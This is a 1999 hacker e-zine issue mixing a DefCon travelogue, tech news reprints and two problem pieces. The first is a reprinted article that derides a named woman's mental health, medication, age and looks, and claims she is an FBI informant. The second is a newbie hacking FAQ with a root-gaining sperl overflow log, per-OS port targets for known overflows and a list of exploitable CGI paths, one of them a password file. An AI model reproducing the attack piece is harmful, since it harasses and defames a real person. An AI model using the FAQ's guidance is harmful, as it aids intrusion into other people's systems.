#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* A mixed bag of nuts in this issue, read on and enjoy..hope you
     * find something interesting or useful...
     *
     * issue #28
     *
     * hwa@press.usmc.net
     *
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Debunking the debunked by route ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.antionline.com Debunking The Debunked Wednesday, July 28, 1999 at 23:57:30 by Mike D. Schiffman - Reprinted With Permission In a 16-foot wide 9-year old trailer park home in New Mexico, a 52-year old delusional woman sits in front of a computer toiling away on a non-technical "hacking" document fraught with errors. You might remember Carolyn P Meinel as 'The Happy Hacker' from such E-Files as "A Weekend Without My Zoloft" and the underground classic "Has Anyone Seen My Dignity?" Although some people would like to classify Carolyn as 'merely' delusional or talent-less, our research has added 'washed-up crackpot' and 'media charlatan.' Often we wonder how Carolyn has achieved so little over so much time, and with this brief interlude, we peel back the layers of the onion with an exclusive report from DefCon7. As it happened during the weekend of July 9th in Las Vegas, NV at the seventh installment of the DefCon Security Convention, it appears that Carolyn forgot her medicine. And these aren't simple antibiotics or histamine blockers (although she could probably use those too). No dear friends, these are powerful psycho-reactive mind-altering chemicals such as sertaline hydrochloride and diazepam. This woman has serious mental problems that require medication and treatment. We caught up with Carolyn in the hotel bar at the Alexis Park, this interviewer was participating in some lighthearted revelry with friends and cohorts, enjoying the ebb and flow of the convention we've come to know and love... Late into the night we had a great time recounting times past. As the night progressed, we moved the group out of the bar into the hotel foyer where our merriment was abruptly halted. The foul stench of insanity lingered in that part of the hotel, and it was instantly known to all that Carolyn was upon us. 
Initially, I found myself finding a good deal of humor with her attire, I pondered the drifter's corpse that she absconded her dress from, and focused on my mission at hand. The question on everyone's lips: "Is Virginia here this year?" However, before I could gather my senses, a whirlwind of stupidity was unleashed as Carolyn's disease attempted to spread to another mind. With her gaping maw open, she turned the boring-machine up to 11 and hosed down an unsuspecting convention-goer. With all that had happened, I was stunned. This was the heaviest blow of all. I could find no other recourse but to confront her on one of the numerous topics that burn in the scene. It was, at that time still unclear to me why she had misinformed the FBI that I was involved in HFG, and I decided to question her on that, in the hopes of two results. Intended result #1 was to shut her the fuck up for a minute. Intended result #2 was to get an explanation, apology, or at best a rationalization. However, as she turned to me with the vapid stare of ignorance, I knew no one could win this battle. No good would come from this conversation, and Carolyn made sure of that. Initially, Carolyn feigned stupidity (which was eerily convincing, but even the best lies are peppered with truth) and claimed she didn't know me. Having dealt with this woman numerous times (including a few *shudder* face-to-face meetings) and given she tried to implicate me within the ranks of HFG, the ruse lacked even humor, as the attempt was so weak. After a few hot comments were traded, Carolyn's attempt at throwing down the gauntlet was to challenge myself and my cohorts to 'hack' into her modified Linux box. Now, perhaps Carolyn misunderstands the way the new generation of hacker-types operate. First of all, we don't get out of bed for less than a hundred dollars. And we certainly don't waste our time breaking into a machine that serves no real purpose. 
Why Carolyn used her box in the capture the flag competition as a challenge is beyond us, as her personal website has been hacked more times than are worth counting. And honestly, at this point, who hasn't received a DCC offer of her mailbox or home directory tarred up? If that is not evidence of her inability to truly secure a box, then I don't know what is. Granted, she wished to rest on her insignificant laurels, and a subtle crack about using finger to break into her box was sufficient to diffuse that portion of the conversation. With her last karate-inept leg kicked out from underneath her, Carolyn attempted to leave with a modicum of respectability, which sadly slipped from her grasp due to her own failings and incompetence... The Granny Hacker from Heck? Hardly (except the older-than-dirt part). The Clown Princess? I suppose this is half true. Clowns are an amusing sort, accustomed to being ridiculed. But I think she missed the princess bit by about 30 years. The Happy Hacker? She didn't seem very happy to us. Especially with the 3 part Antionline article, that starts off attempting to be slightly informational, but ends up being a diatribe of self-promotion and bitter remarks about convention goers. No Carolyn, you're not part of "the club". We're sorry, but you're too crazy, too medicated, too old, and too stupid. Also, Carolyn, you had more than a week between the end of DefCon and the posting of the Antionline article. The best insult you could come up with was to say I `pumped my muscles up with a bike pump`? I mean, what sort of 1940's street-tough book of insults are you consulting? Double dumbass on you Carolyn. Contrary to what she swears up and down, Carolyn Meinel is indeed a confidential informant for the Federal Bureau of Investigation, and her status is listed as "MI" and "PS". MI indicates that the informant suffers from a mental or emotional dysfunction, and all information must be scrutinized as such. PS means that she is a probable suspect. 
This is why the FBI polygraphed her. Do you trust her? Now, don't get us wrong. We actually like Carolyn Meinel. As Virii makers have a symbiotic relationship with companies that make Anti-Virii software, true hackers and their ilk have a symbiotic relationship with the uninformed vocal nay-sayers that try to misinform the public as to our actions. Without Carolyn, no one would know how great we really are. It is impossible to fully appreciate what `good` is when you have no frame of reference in understanding what `bad` is. For this, we can only thank you Carolyn. Your efforts and misinformation only further our roles as highly paid debunkers of your insanity. When you're 65 and retired, or possibly deceased -- we'll just be entering the prime of our lives and professional careers. If you're still around then and your descent into lunacy hasn't pushed you over the brink, look us up. We love clowns. And, by the way Carolyn, do send Virginia my love. @HWA 04.0 DefCon 7 by Agent X ~~~~~~~~~~~~~~~~~~~ (Thanks to Agent X for permission to reprint this - Ed) Defcon 7 by Agent X Prelude Defcon baby, yeah that's the ticket, hackers, computer security consultants, feds, kooks, surveillance geeks, and a whole slew of other weird ass spooky mother fuckers, get drunk, go to titty bars, talk about crypto and network security, fucking with the media, blowing shit up in the desert and generally have a great fucking time in the city of sin all under the guise of a computer security convention. And if they are lucky or sneaky paid for by their respective bosses. I am neither lucky or sneaky so I'm paying for this out of my own pocket, which by the way sucks. But I'm ready the tickets are bought the gear is packed. I have fortified myself for this trip, with a bowl of corn flakes, a cache of CDs, and a hangover. I dry swallow two Alleve as I step out the door. The 3 hour bus ride to the airport was about as exciting as a 3 hour a bus ride can be. In other words deathly boring. 
But the headache is gone.

I'm at the airport lounge, drinking a L.I.T and trying to figure out if 7 bucks is too much to pay for a burger. Airports are about the most boring places to be stranded for any length of time as well. The televisions only show 2 things, golf or 5 minute news reels. The food is generic and expensive. And there is no fucking place to check my e-mail. Only another 4 hours till my plane leaves.

The Plane:

It's a sign when 12 mothers carrying screaming babies get on the flight. We hit the worst turbulence I have ever seen or felt. [the guy beside me just used his barf bag for its intended purpose]. I can see it now the wings snap off and barrrroooooooom! I'm just another flight statistic. Wouldn't that just be the rat's asshole to die on the way to Detroit.

[Note at this point this article goes into short hand mode, there was just too much happening too quickly for me to mention, remember or talk about]

Friday

From this point on things become an insane blur of meeting new people and getting things done. I arrive 3 hours late to the hotel, the people I'm staying with had a hell of a time checking in and I'm exhausted, I have a glass of water and go to bed.

Friday

First day of con I get up, get dressed and eat some breakfast all by 7:00. To do my part by gooning at the con. Big mistake. It's a mad rush after that, from getting a goon badge to working on pre-registration. The List for registration is great except that it's not in any order. So I GREP the whole list a couple of hundred times during the con. I check people in all day long. By the end of the day I know almost everyone at con who is on the list.

Naked people count for Friday:
1 guy gets up on a table and strips down to his G-string,
2 naked fat guys jog around the vendor area for free t-shirts
1 babe hops up on a table and gives everybody a show of her tits.

I love Vegas. The day is hectic and long.
I'm exhausted by the time I sit down at 7:17 to write this before heading out to the MGM grand for some dinner. Vegas is a weird ass place. New York New York the most disturbing of all. The fake graffiti, the fake manhole cover with fake steam, all in fake NYC it is not right. I was just waiting for a fake mugging in a fake dark and dirty alley. After getting back to the hotel I collapsed on the bed.

Saturday

Slept a hard 8 hours last night, got up and helped register people, mad craziness more people than you could possibly imagine. All of them young white males.

Checked out the DJ action, saw my ghetto hacker buddies TDA and Jester 47 spin some mad tunes to Ninja Scroll video.

The CDC show rocked ass. Total mayhem, with a revival theme, it doesn't get much better than this. Things slowed down a bit. Checked press badge for the After CDC presentation in the media suite. Went up and talked with some media types. Got to see what the media is like in action. I expected to hear some really probing questions that were well researched and insightful. They weren't, nuff said.

Finally got to chill about 7 or 8 helped set up for the root suite party. Went back to my room changed and got booze, went back to the root suite and proceeded to drop a complete bottle of tequila on the floor.

Saturday night

Mad partying in the root suite Saturday night. I played bartender for most of the night, pouring DoC beers, serving punch and mixing drinks. Dis Org Crew beer was great. The Strawberry SYN Flood was smooth and sweet, the Brown Box Barley Wine was strong as hell, and the FireWire Stout which is fortified with caffeine is the perfect hacker beer. Congrats to HCF, Wyatt Earp, Pete Shipley and the rest of the DoC who helped for a great beer. Caezar definitely knows how to throw a party. Towards the end of the night I was getting help from Jennifer Granick. Left about 4 or 5 went back to the room and slept like the dead. Slept for 2 hours and got back up.
I had an English muffin for breakfast, it was good.

Sunday

By Sunday the kinks had been somewhat worked out and things were finally running reasonably smoothly, I helped with this and that. Sold shirts and mugs for the better part of the morning, some guy wanted to trade a rental car for a t-shirt, I told him to get permission from Priest. He ended up trading us some porno passes for a shirt instead. Finally had lunch with some cool people, one of which was with the NSA.

After lunch I'm up in the media/goon lounge resting and eating some fruit with Major Malfunction when his radio goes off, "all goons to the NOC" and then "Carolyn is being kicked out". Needless to say Carolyn got kicked out of con.. I'm sure that she will write all about it on her web site. I'm sure she will paint herself as the victim, either way I don't care, she is an adult and she should have known better.

Afterward I wandered around some more. Said good-bye to all the people I could find. Went back to the hotel, grabbed my bag, went and got on a plane, fell asleep. Switch planes fell asleep. Got off plane got on bus fell asleep, switch busses fell asleep. Got off bus got home fell asleep.

....till next year.

Quotes from the weekend:

A short conversation I had with some newbie kid who wandered into the root party.

"So you're in l0pht"
"oh yeah me and the rest of the east coast people"
"really"

"My son did his first hack at age 7, I was so proud." Major Malfunction.

Who

Agent X is a slacker.

The views, commentary and ideas expressed in this article are not those of Hacker News Network, its Editors or the Defcon Organizers. I own my own words.
Agent_X@flashmail.com

Links referenced in the original HTML version of this article:

http://www.defcon.org
http://www.cultdeadcow.com/
http://www.dis.org/doc.html
http://www.dis.org/warz/beer.html
http://www.caezarschallenge.org/

@HWA

05.0 Hacking Faq by ben-z 5/14/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There are a number of "hacking faqs" around the net most of which date back at the very least to 1996 this is one of the few 'new' ones i've come across, so i've decided to share it here for your reading pleasure, its aimed at the 'newbie hacker' and is written by a well known underground denizen, ben-z - Ed

Found at http://come.to/sota

[**] FAQ: Hacking @ 5/14/99 by ben-z [**]
NOTE: if date > */2000, dont bother reading this.
http://www.slacknet.org | benz@slacknet.org

A. Section [I] -- Beginners

(index)

01. How do i tell if a system is running UNIX?
02. How do i determine which flavor of UNIX a system runs?
03. What exactly happens when i "hack" UNIX?
04. Do I need an account on a system to hack it?
05. What is DoS?
06. How do I protect myself from DoS attacks?
07. What is a buffer overflow?
08. What are some good web/ftp sites for UNIX?
09. What is BSD?
10. What is Linux?
11. What does x86 have to do with anything?
12. What else is there besides x86 systems?
13. What are some commonly open services to look for?
14. What is the easiest way to hack a system right now?
15. Can i hack anything from windows?
16. Why is Linux a better OS than windows?
17. What is suid/sgid?
18. Where is the best source of info for newbies?
19. How much trouble can I get in for hacking?
20. What kind of system should I try hacking first?

(Q/A)

01. How do i tell if a system is running UNIX?

A: There are several ways to determine the operating system of a remote system. The first and foremost way to determine if a system is running UNIX is to both telnet and ftp to it, then check the login message.
For telnet, if you get anything like BSD, UNIX, Linux, AIX, IRIX, or HPUX then it is most likely a unix system. However, it is possible to change the message displayed (/etc/issue.net) when a telnetd connection is established, so telnet banner grabbing is not always the most reliable. Via ftp, you can usually make a fairly accurate guess at the OS by looking at the ftpd version. If you see something like wu, ncftpd, or proftpd, then it is a UNIX system. Most large ftp archives run UNIX, but just in case, look for a message containing "Microsoft" or "Serv-U", which do not run on anything but ms windows (bad!).

Another more accurate way of determining the OS is to examine the packets via predetermined OS fingerprints. There are several packages out now which do this, the best of them being nmap by fyodor (http://www.insecure.org/nmap), and queso by els apostols. These simply scan the open ports on a system and attempt to find a match for the packet types. Nmap currently includes hundreds of OS fingerprints, and is known for its accuracy and speed.

OS fingerprinting is not one-hundred percent accurate either; the details of this are too complex for this paper. Basically, some system administrators change the look of the outgoing packets to fool your scanner into thinking it is something else, or give it no reading whatsoever. The details are available at http://www.geek-girl.com/bugtraq.

02. How do i determine which flavor of UNIX a system runs?

A: (see telnet banner grabbing description above) -- telnet banners often reveal which OS and version the system is running. If you have local access to the machine (an account), then you can type uname -a to see some system information. On Linux, you can cd to /proc and cat cpuinfo for other interesting stats. If the system is running RedHat Linux, then a file exists in /etc called redhat-release which contains the release and version of the system.
I am also working on a package to determine the distribution of a system via comparing rpm's to known fingerprints (similar to nmap), thus making it easier to find an exploit which will work on the system.

03. What exactly happens when i "hack" UNIX?

A: To know whether or not you have successfully "hacked" a UNIX system, there are a few commands you need to be familiar with:

command | description
--------+------------------------------------------------------------------
id      | prints your current UID/GID. 0 = root = success!
whoami  | determines which user you are logged in as.
set     | shows a list of some system variables including $USER and $EUID.

If you don't know what root is, then you need to do some background UNIX research before reading this again. Otherwise, here are a few other tricks to see if you are really root.

a. bash prompt: When logged in as a normal user, you usually have a prompt similar to bash$. As root, your prompt defaults to bash#.

b. system variables: typing echo "$USER / $EUID" *should* effectively tell you which user the system thinks you are.

c. file access: As root, you should have access to read/write most files. Try logging in as a normal user and reading /etc/shadow or /etc/passwd. Most systems do not allow normal users to read these files for security reasons; however, if you are root, you may read/write them as you wish.

04. Do I need an account on a system to hack it?

A: No. Many systems can be compromised remotely via overflows in vulnerable services running. This is the main difference between hacking UNIX and NT: UNIX was designed with remote administration in mind, thus making it easier to manipulate once access is obtained. With NT, no telnet daemon is present, and playing around usually requires your presence at the actual system itself.
Of course anyone with 1/2 of a brain can secure their system from remote attacks, so a local account is a definite bonus.

05. What is DoS?

A: No kiddies, this isn't C:\DOS. This is Denial of Service, a very deadly (and lame) concept. As there are very few useful purposes for DoS, it is mostly used to show power and skill, even though it requires almost no skill whatsoever. The only useful reason i can think of to DoS a system is for spoofing purposes: when a system is taken off of a LAN, you can change your address to the one you knocked off, and intercept vital information and user passwords. This is explained in detail at http://www.rootshell.com (under documentation) look for whitepapers on tcp hijacking.

Ok, back to my explanation of DoS. Denial of Service by definition is simply denying service to any machine on a network, thus causing problems and/or crashing the system. The most popular DoS attacks out right now (to my limited knowledge) are papasmurf, boink/poink, feh, smack, bmb, and synk5. These are commonly used toys on irc, so watch your back.

06. How do I protect myself from DoS attacks?

A: There is no one-hundred percent reliable method for stopping DoS attacks. If the attacker's bandwidth is much greater than yours, then you lose: end of story. However, if the attacker has equal or lesser resources than you, they are easily filtered out by software such as ipfwadm for linux 2.0.x, ipchains for linux 2.2.x, and conseal pc firewall for windows. Some interesting firewall/filtering scripts can be found at http://www.freshmeat.net and http://www.linuxberg.com. If you like to chat on irc (yay!), then it is wise to use a bnc (bounce) to hide your real address and virtually irc off of a faster connection. bnc source is available for download at ftp.bitchx.org/pub/misc.

07. What is a buffer overflow?

A: In short, a buffer overflow is the pushing of data onto a stack, thus executing carefully constructed code as the user the program is running as.
Example:

[benz@oldbox]$ whoami
benz
[benz@oldbox]$ /usr/bin/sperl4.036 AAAAAA(etc..) [garbage]/bin/sh
Segmentation Fault
[root@oldbox]# whoami
root

The above log is an example of the classic sperl overflow which drops root access. To make sure the program you are trying to overflow will give you root, you need to type ls -al file and look for "s" in the permissions somewhere, and that it is owned by root. This indicates that the program is suid/root and when run will actually switch to user root and execute. This explanation is a very short and simple version of a complex topic, which can be studied in more detail at http://www.phrack.com - issue 49-14: "Smashing the Stack for Fun and Profit" by Aleph One.

08. What are some good web/ftp sites for UNIX?

A: Bugtraq security mailing list: http://www.geek-girl.com/bugtraq
   rootshell archives (out of date): http://www.rootshell.com
   technotronic archives: ftp://ftp.technotronic.com
   SlackNet: http://www.slacknet.org
   Linux.org: http://www.linux.org
   FreeBSD.org: http://www.freebsd.org
   Packetstorm: http://packetstorm.genocide2600.com
   2600 magazine: http://www.2600.com
   Phrack magazine: http://www.phrack.com

09. What is BSD?

A: BSD, short for Berkeley Systems Distribution, is a UNIX flavor known for its stability and ease of use. More information can be found at http://www.freebsd.org, http://www.openbsd.org, www.bsdi.org, etc.

10. What is Linux?

A: Linux, originally developed by Linus Torvalds, is a POSIX based OS commonly used by everyone from hackers to goat feeders. more information can be found at http://www.linux.org.

11. What does x86 have to do with anything?

A: x86 is the standard abbreviation for an intel processor based system. the x has nothing to do with the processor, it is simply a wildcard definition for all *86 systems. Example: i386, 586 (pentium).

12. What else is there besides x86 systems?

A: Besides Intel based systems, there are many other architectures used with UNIX.
Probably the most common non-x86 architecture is a sparc. Although capable of handling almost anything, these typically run either SunOS or Solaris.

13. What are some commonly open services to look for?

A: The services i generally look for the most are very dependent on what OS the target is running. For example, if the target system is Linux 2.0.3x, I typically scan for rpcbind/portmap on tcp/111 because of the well known mountd overflow. Below is a brief list of what I check for specifically on several operating systems.

Redhat 4.2: tcp/143 (imap), etc..
RedHat 5.0: tcp/25 (sendmail), tcp/143 (imap), tcp/25 (qpop), tcp/53 (bind)
RedHat 5.1: tcp/111 (rpcinfo -p ), tcp/110 (qpop), tcp/53 (bind)
RedHat 5.2: tcp/21 (wu-2.4.2-academ[BETA-18](1))
Slackware:  tcp/111 (rpc), tcp/110 (qpop), tcp/21 (wu-ftpd), tcp/53 (bind)
FreeBSD:    tcp/110 (qpop), tcp/143 (imap), tcp/53 (bind)
Solaris:    tcp/110 (rpc), tcp/53 (bind)

14. What is the easiest way to hack a system right now?

A:

15. Can i hack anything from windows?

A: Surprisingly, yes. There are about 50 different ways you can hack with just a web browser. These are known as cgi exploits; below is a list of several which i typically check for:

/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/Count.cgi
/cgi-bin/info2www
/_vti_pvt/service.pwd
/cgi-bin/test-cgi
/cfdocs/expeval/openfile.cfm
/cgi-dos/args.bat
/cgi-win/uploader.exe

16. Why is Linux a better OS than windows?

A: There are hundreds of reasons why Linux owns windows, but instead of explaining all of them, I'll just give you some advice: take my word for it. If you happen to be one of those people that needs facts to survive, check out http://www.darkelf.net/metachart.

17. What is suid/sgid?

A:

18. Where is the best source of info for newbies?

A: My best recommendation would definitely have to be irc. Since most hackers tend to learn things on their own, hacking resources are not as plentiful as they probably should be, but there are still excellent sources available.
See the URL section above for more information.

19. How much trouble can I get in for hacking?

A: The typical student hacker (such as me) is still under the age of 18, rendering him a minor. If adult charges cannot be filed, then don't worry about much other than a harsh bitching and possibly a small fine. For those of you that no longer have the age advantage, I recommend consulting a lawyer before getting seriously into hacking. This may sound a bit extreme, but anyone who gets good enough to be noticed needs a lawyer eventually anyway. For some information on what can happen as an adult, just take a look at http://www.kevinmitnick.com.

20. What kind of system should I try hacking first?

A: For beginners, the first computer I recommend trying to root is your own. There is no better way of security and learning than a local machine that you actually own and operate. Try experimenting with several UNIX flavors such as Linux and BSD, then it's up to you from there.

[**] don't worry.. part [II] Intermediate instruction is coming! [**]

@HWA

06.0 Group approves controversial software law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y

http://www.infoworld.com/cgi-bin/displayStory.pl?990729.ecucita.htm

Group approves controversial software law

By Jack McCarthy, Nancy Weil, and Jessica Davis
InfoWorld Electric
Posted at 5:00 PM PT, Jul 30, 1999

In a blow to both big corporate software consumers and those who buy their software in retail stores, a group that works to unify state laws this week passed the Uniform Computer Information Transactions Act (UCITA) legislation, which is widely opposed by software consumer advocates, software developers, and IT organizations.

The legislation will theoretically allow software vendors to repossess software by disabling it remotely, and to disclaim warranties. It will also prevent the transfer of software licenses from one party to another without vendor permission, and will outlaw reverse engineering.
UCITA's opponents said that its development was heavily influenced by software manufacturers, and that it favors them in software contracts and disputes concerning software licensing.

"What purpose is it going to serve other than litigation and additional cost to users?" said Michael Scott, a senior engineer at the California Department of Transportation, in Sacramento, Calif. "It sounds like a great coup for the software industry, but doesn't sound very advantageous for users."

Members of the National Conference of Commissioners on Uniform State Laws (NCCUSL) voted on UCITA and several other revisions to the commercial code at their annual meeting in Denver.

In a state-by-state vote, 43 states approved UCITA, six opposed it, two abstained, and two were not present at the voting. The proposal now goes to various state legislatures for approval. Most or all states typically approve the laws recommended by the NCCUSL.

IT opposition to the legislation, including a letter-writing campaign to members of the NCCUSL, failed to sway the commissioners. The dry, complex language of the 123-page legislation may also have contributed to a lack of understanding on the part of many software users.

Proponents of the legislation have said that UCITA is a necessary step in defining the law regarding software and computer information sales, which were not contemplated when the Uniform Commercial Code (UCC) for the sale of goods was written.

The act means both vendors and users will be able to count on a uniform law, instead of relying on differing laws on a state-by-state basis, according to Ray Nimmer, a law professor at the University of Houston Law Center and the law's primary author.

"We think that this will extend the rights of end-users," Nimmer said.

Nimmer said that the opposition to the law during the last year and a half has been punctuated by hyperbole, and now it is critical that the debate shift over to reality.
Opponents to the legislation include technology consumer groups, various trade associations, and some law professors, who contend that UCITA will result in increased costs for companies, while giving software vendors undue power.

"This law is going to be bad for the industry and for the country," said Cem Kaner, a software developer, attorney, and author who has taken a lead in fighting the proposal. "It redefines intellectual property law in a way that transfers huge amounts of power from the public, including universities, libraries, and [software] customers, to software publishers."

In the days before the final UCITA vote, several state attorneys wrote letters to the president of NCCUSL, urging the group to reject the law. An estimated 25 to 28 attorneys general have gone on the record in opposition, including those from Connecticut, Idaho, Indiana, Iowa, Kansas, Oklahoma, Pennsylvania, and Washington state.

The National Conference of Commissioners on Uniform State Laws, in Chicago, is at www.nccusl.org.

Jack McCarthy is a San Francisco correspondent for the IDG News Service, an InfoWorld affiliate. Nancy Weil is a Boston correspondent for the IDG News Service, an InfoWorld affiliate. Jessica Davis is an InfoWorld associate news editor.

@HWA

07.0 Falun Gong Web Sites Attacked by China?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by tacscan
Falun Gong, a meditation group, is claiming that the web sites of its supporters are being targeted and attacked by China. Initial evidence seems to point to the Public Security Ministry's Internet Monitoring Bureau as the agency responsible for various attacks. Falun Gong, outlawed in China, is a group that draws on martial arts, Buddhism and Taoism and is devoted to physical and mental fitness, high moral standards, and denies that it is either a religion or a political movement.
Boston Globe http://www.boston.com/dailynews/211/nation/Chinese_officials_try_to_hack_:.shtml Chinese officials try to hack U.S. Web sites, meditation group members say By Peter Svensson, Associated Press, 07/30/99 16:17 NEW YORK (AP) Web sites in the United States and elsewhere devoted to the Falun Gong meditation group are coming under heavy electronic attack, managers of the sites said Friday, and at least one ''hacking'' attempt appears to trace back to a Chinese national police bureau in Beijing. Falun Gong has been banned in China, where communist authorities are engaged in an escalating crackdown, arresting adherents and confiscating publications and videos. Bob McWee, of Middletown, Md., a Falun Gong practitioner, said a site he maintains to promote the group, www.falunusa.net, has been under persistent electronic assault. In a telephone interview, McWee said his Web server was undergoing a continuous ''denial-of-service'' attack, a common Internet tactic used to overwhelm a computer with repeated electronic requests like a telephone ringing nonstop to block other callers. In addition, someone tried to gain access to the server, pretending to be a legitimate webmaster, and in the process left an Internet address, he said. ''They tried to hack my machine from theirs. And they can't do that without revealing their'' Internet address, he said. The address McWee said was left behind is registered with the Asia Pacific Network Information Centre, a public registry service for Internet addressees. According to the service, there are two phone numbers in Beijing listed with that address. When The Associated Press called the numbers, a person who answered the phone identified them as belonging to the Public Security Ministry. A telephone operator at the ministry said they belonged to its Internet Monitoring Bureau. Ministry officials and spokesmen refused to comment Friday. 
McWee registered a complaint about the hacking attempt with the Maryland state police's computer crimes division. Police spokesman Pete Piringer said that because the attack did not succeed in getting access to McWee's server, there did not seem to be a crime committed. A U.S. government agency saw an indirect sign of the attacks. A network engineer at the U.S. Department of Transportation contacted McWee when they noticed his server was contacting one of their computers unasked, according to Everett Dowd, deputy director of telecommunications of the Information Technology Operation at the department. McWee said this was because the denial-of-service attack sent requests to his server with forged return addresses, one of which happened to be the department's server. Administrators of other Web sites devoted to the movement also said they had been attacked. Li Shao, in Nottingham, Britain, said the site he maintains was hacked into Monday. What he called Chinese ''government propaganda'' was placed on some pages, while others were deleted. Jillian Ye, of Toronto, Canada, who maintains two sites, said that beginning one or two months ago, her server began going down almost every day. The problems got progressively worse, until she recognized the symptoms of an attack and moved the sites to a more secure server. In their barrage of criticism of Falun Gong, Chinese state media have cited the group's Internet presence as proof that it was well-organized and not just harmless meditation buffs. A government ban on Falun Gong publications passed after the group was outlawed includes electronic publications. Nearly all of Falun Gong Web sites in China have been shut down since the ban was announced. China's communist leaders banned the Falun Gong movement last week, accusing it of trying to develop political power. 
Falun Gong leaders have denied any political ambitions and denied they organized protests that erupted two weeks ago after authorities reportedly arrested leading members of the group.

Falun Gong, founded by Li Hongzhi, who now lives in the United States, draws on martial arts, Buddhism and Taoism. The group says its goals are physical and mental fitness and high moral standards, and denies that it is either a religion or a political movement.

Associated Press Writer John Leicester in Beijing contributed to this report.

@HWA

08.0 Super Computer Almost Gets Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mudge
Sandia National Laboratories sold a surplus nuclear weapons research computer, an old Intel Paragon XPS, as "spare parts", without the OS to a Chinese national in California for $30,000 last October. Quing-Chang Jiang, a citizen of the People's Republic of China, then tried to buy the parts from Intel needed to make it run again. After conferring with the DOE, Sandia then paid $88,000 two weeks ago to get it back because of security worries about the deal. The computer, the fastest in the world in 1993, while now obsolete by U.S. standards, could have aided a foreign government in duplicating the advanced work done by US nuclear weapons labs. (Super Computers just aren't that hard to get a hold of these days, even fully functional ones.)

San Jose Mercury News - second story
http://www7.mercurycenter.com/premium/nation/docs/natwashdig24.htm
< link broken/Story missing - Ed >

Posted at 8:57 p.m. PDT Friday, July 23, 1999

U.S. buys back computer sold to Chinese citizen
Associated Press

WASHINGTON -- The Energy Department's Sandia National Laboratory last week bought back a supercomputer it had sold as surplus to Korber Jiang, a Chinese citizen who is the principal of EHI Group USA and exports American goods to his home country.

Rep.
Curt Weldon, R-Pa., called Friday for Energy Secretary Bill Richardson's resignation, saying that the computer could have been used ``to design nuclear weapons.''

``He's going around the country saying there are no problems in the Department of Energy, that everything is under control,'' Weldon said in a telephone interview. ``If there are no problems, then how can this happen?''

Neal Singer, a spokesman for Sandia National Laboratories, said that the New Mexico facility sold the Intel Paragon XPS to Korber's one-man company for $30,000 in October. After discovering Korber's nationality, Singer said, the department bought back the computer for $88,000 last week and stored it under guard at Sandia. The spokesman said the difference in cost may have been due to shipping costs incurred by Korber.

``Secretary Richardson has instituted a moratorium on any sales of surplus material that incorporates export control technology until there has been a thorough review of what happened,'' said Energy Department spokeswoman Brooke Anderson.

The transaction was first reported by Insight Magazine.

@HWA

09.0 Symantec's website hacked
~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y

It was rumoured that the site was not only hacked but also infected with virii, this article tries to clear up the story, ZDNET - ed

http://www.zdnet.com/filters/printerfriendly/0,6061,2307804-2,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Symantec: Vandals didn't infect us
By Robert Lemos, ZDNN
August 2, 1999 2:02 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html

Internet vandals broke into the servers of network security and utilities firm Symantec Corp. Monday morning, defacing the company's Web site.
While the vandals claimed to have infected Symantec's network two months ago with a worm, quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems. "There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders, a spokesman for the Cupertino, Calif., company. "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home page." The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The document was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday. Worms are virus-like programs that infect systems through networks automatically and without the need for an unknowing user to open a file or run an application. Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard nut to crack. The only difference: This time someone actually got in. "What this incident does show is that you cannot be complacent towards this kind of threat," said Saunders. The Symantec spokesman could not detail how the cyber vandals entered the company's network. Symantec engineers took down the page within an hour of its posting, but not before the media in Europe got wind of the defacement. The BBC posted a story early Monday morning. -=- BBC; Anti-virus company hacked A leading provider of net security and anti-virus software, Symantec, has had its website hacked for about 12 hours, ending around 1300 BST. The FBI has been informed and is already beginning an investigation. Visitors to www.symantec.com early on Monday found a page claiming that a group of five crackers had infiltrated Symantec's servers with a virus called bloworm. 
The crackers said that their virus, a worm, has been spreading around Symantec's network, infecting files for two months.

However, Aled Miles, Symantec's Regional Director for UK and Ireland, told BBC News Online: "I can categorically state that there is no effect on our servers internally - that is a hoax which adds to the publicity wagon."

He added that: "We have established that there was no risk [of infection] to anyone visiting our website during that time."

Symantec are the makers of Norton Anti-virus software and their UK website says: "Symantec is a leader in Internet and content security."

The hacking of their website will be seen as embarrassing but Mr Miles said that any organisation, even the CIA itself, could fall prey to malicious attacks like these.

He said: "The sad reality is that whilst the Internet is a tremendous new technological force, it comes with its down side. What matters is how quickly we as a company react to this type of incident.

"What I am not embarrassed about is the speed and agility we have shown in sorting this out. I don't think it damages our reputation in the slightest."

Symantec has become a higher profile target in recent months due to its work in combatting viruses such as Melissa, explore.zip and the program Back Orifice.

@HWA

10.0 New virus due to hit town "New virus spills your beans " - BBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y

BBC
http://news.bbc.co.uk/low/english/sci/tech/newsid_381000/381054.stm

Tuesday, August 3, 1999 Published at 15:11 GMT 16:11 UK

New virus spills your beans

A new strain of computer virus could distribute your highly confidential documents all over the Internet.

Anti-virus developers are warning that they cannot develop an antidote until the virus appears.

Far from destroying vital files, the virus will make sure everyone can see them.
